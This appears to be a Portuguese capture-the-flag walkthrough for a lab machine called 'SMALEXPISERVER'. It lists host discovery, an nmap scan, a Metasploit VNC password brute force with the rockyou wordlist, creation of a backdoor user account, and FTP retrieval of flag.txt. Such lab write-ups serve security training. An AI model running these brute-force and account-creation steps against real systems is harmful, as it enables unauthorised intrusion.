Você está na página 1de 6

Pentest StEp by sTeP

DESAFIO SMALEXPISERVER

1. Utilizar o netdiscover.

kali@kali:~ # sudo netdiscover

2. Utilizar o nmap.

kali@kali:~ # nmap 192.168.1.114

3. Verificar serviços a funcionar.

4. Visualizar website, uma vez que a port 80 está aberta.


Pentest StEp by sTeP
DESAFIO SMALEXPISERVER

5. Iniciar o Metasploit Framework e utilizar vnc_login, uma vez que a port 5900.

msf6 > use auxiliary/scanner/vnc/vnc_login

6. Utilizar opções disponíveis.

msf6 > show options

7. Visualizar opções disponíveis.

8. Digitar o IP da máquina vítima (RHOSTS).

msf6 > set RHOSTS 192.168.1.114


Pentest StEp by sTeP
DESAFIO SMALEXPISERVER

9. Selecionar o ficheiro de passwords:

msf6 > set PASS_FILE /usr/share/wordlists/rockyou.txt

10. Ativar a velocidade de teste de nova password (máx 5).

msf6 > set BRUTEFORCE_SPEED 1

11. Concluir pesquisa assim que obtiver credencias corretas.

msf6 > set STOP_ON_SUCCESS true

12. Explorar a vulnerabilidade.

msf6 > exploit

13. Utilizar um cliente vnc.

kali@kali:~ # xtightvncviewer 192.168.1.114


Pentest StEp by sTeP
DESAFIO SMALEXPISERVER

14. Digitar a password obtida e testar o acesso remoto ao alvo.

15. Aceder ao Painel de controlo, User Accounts.

16. Efetuar clique em Create a New Account.

17. Digitar o nome da conta e efetuar clique em next.


Pentest StEp by sTeP
DESAFIO SMALEXPISERVER

18. Confirmar com clique em Create Account.

19. Efetuar clique sobre a conta criada.

20. Efetuar clique em Create password.

21. Digitar a password, confirmar e efetuar clique em Create password.


Pentest StEp by sTeP
DESAFIO SMALEXPISERVER

22. Aceder ao pc alvo por ftp.

kali@kali:~ # ftp 192.168.1.114

23. Digitar o nome da conta criada bem como a password.

24. Listar o conteúdo.

25. Copiar o ficheiro flag.txt.

26. Sair do servidor.

27. Verificar o conteúdo da flag.txt.

kali@kali:~ # cat flag.txt

Você também pode gostar